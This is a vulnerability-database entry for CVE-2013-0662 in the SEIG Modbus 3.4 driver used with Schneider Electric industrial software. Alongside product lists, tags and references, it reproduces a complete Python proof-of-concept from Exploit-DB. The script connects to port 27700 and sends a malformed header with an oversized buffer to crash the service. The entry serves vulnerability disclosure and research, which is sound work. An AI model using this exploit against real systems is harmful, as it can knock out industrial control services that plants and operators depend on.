ID

VAR-E-201403-0100


CVE

cve_id:CVE-2013-0662

Trust: 2.9

sources: BID: 66500 // PACKETSTORM: 149000 // PACKETSTORM: 148995 // EXPLOIT-DB: 45219 // EDBNET: 98951

EDB ID

45219


TITLE

SEIG Modbus 3.4 - Denial of Service (PoC) - Windows_x86 dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45219

DESCRIPTION

SEIG Modbus 3.4 - Denial of Service (PoC). CVE-2013-0662 . dos exploit for Windows_x86 platform

Trust: 0.6

sources: EXPLOIT-DB: 45219

AFFECTED PRODUCTS

vendor:seigmodel:modbusscope:eqversion:3.4

Trust: 3.8

vendor:schneidermodel:electric unity proscope:eqversion:6.0

Trust: 0.3

vendor:schneidermodel:electric unity proscope:eqversion:6

Trust: 0.3

vendor:schneidermodel:electric opc factory serverscope:eqversion:3.34

Trust: 0.3

vendor:schneidermodel:electric opc factory driverscope:eqversion:3.34

Trust: 0.3

sources: BID: 66500 // PACKETSTORM: 149000 // PACKETSTORM: 148995 // EXPLOIT-DB: 45219 // EDBNET: 98951 // EDBNET: 98991 // EDBNET: 98990

EXPLOIT

# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662

import socket
import struct
import time

ip = "192.168.127.137"
port = 27700
con = (ip, port)

header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
header_end = "\xFF"

header = header_padding + header_buffer_size + header_recv_len + header_end
message = "\x00\x64" + "A" * 2267

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(header)
s.send(message)

Trust: 1.0

sources: EXPLOIT-DB: 45219

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 45219

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45219

TYPE

Denial of Service (PoC)

Trust: 1.6

sources: EXPLOIT-DB: 45219 // EDBNET: 98951

TAGS

tag:exploit

Trust: 1.0

tag:Denial of Service (DoS)

Trust: 1.0

tag:denial of service

Trust: 0.5

tag:remote

Trust: 0.5

tag:code execution

Trust: 0.5

sources: PACKETSTORM: 149000 // PACKETSTORM: 148995 // EXPLOIT-DB: 45219

CREDITS

Alejandro Parodi

Trust: 0.6

sources: EXPLOIT-DB: 45219

EXTERNAL IDS

db:NVDid:CVE-2013-0662

Trust: 4.1

db:EXPLOIT-DBid:45219

Trust: 1.6

db:EDBNETid:98951

Trust: 0.6

db:0DAYTODAYid:30924

Trust: 0.6

db:EDBNETid:98991

Trust: 0.6

db:0DAYTODAYid:30923

Trust: 0.6

db:EDBNETid:98990

Trust: 0.6

db:PACKETSTORMid:149000

Trust: 0.5

db:PACKETSTORMid:148995

Trust: 0.5

db:BIDid:66500

Trust: 0.3

sources: BID: 66500 // PACKETSTORM: 149000 // PACKETSTORM: 148995 // EXPLOIT-DB: 45219 // EDBNET: 98951 // EDBNET: 98991 // EDBNET: 98990

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-0662

Trust: 2.6

url:https://www.exploit-db.com/exploits/45219/

Trust: 0.6

url:https://0day.today/exploits/30924

Trust: 0.6

url:https://0day.today/exploits/30923

Trust: 0.6

url:http://www.schneider-electric.com/site/home/index.cfm/ww/?selectcountry=true

Trust: 0.3

sources: BID: 66500 // PACKETSTORM: 149000 // PACKETSTORM: 148995 // EXPLOIT-DB: 45219 // EDBNET: 98951 // EDBNET: 98991 // EDBNET: 98990

SOURCES

db:BIDid:66500
db:PACKETSTORMid:149000
db:PACKETSTORMid:148995
db:EXPLOIT-DBid:45219
db:EDBNETid:98951
db:EDBNETid:98991
db:EDBNETid:98990

LAST UPDATE DATE

2022-07-27T09:18:50.368000+00:00


SOURCES UPDATE DATE

db:BIDid:66500date:2015-03-19T09:42:00

SOURCES RELEASE DATE

db:BIDid:66500date:2014-03-27T00:00:00
db:PACKETSTORMid:149000date:2018-08-20T16:53:07
db:PACKETSTORMid:148995date:2018-08-20T16:47:30
db:EXPLOIT-DBid:45219date:2018-08-20T00:00:00
db:EDBNETid:98951date:2018-08-20T00:00:00
db:EDBNETid:98991date:2018-08-24T00:00:00
db:EDBNETid:98990date:2018-08-24T00:00:00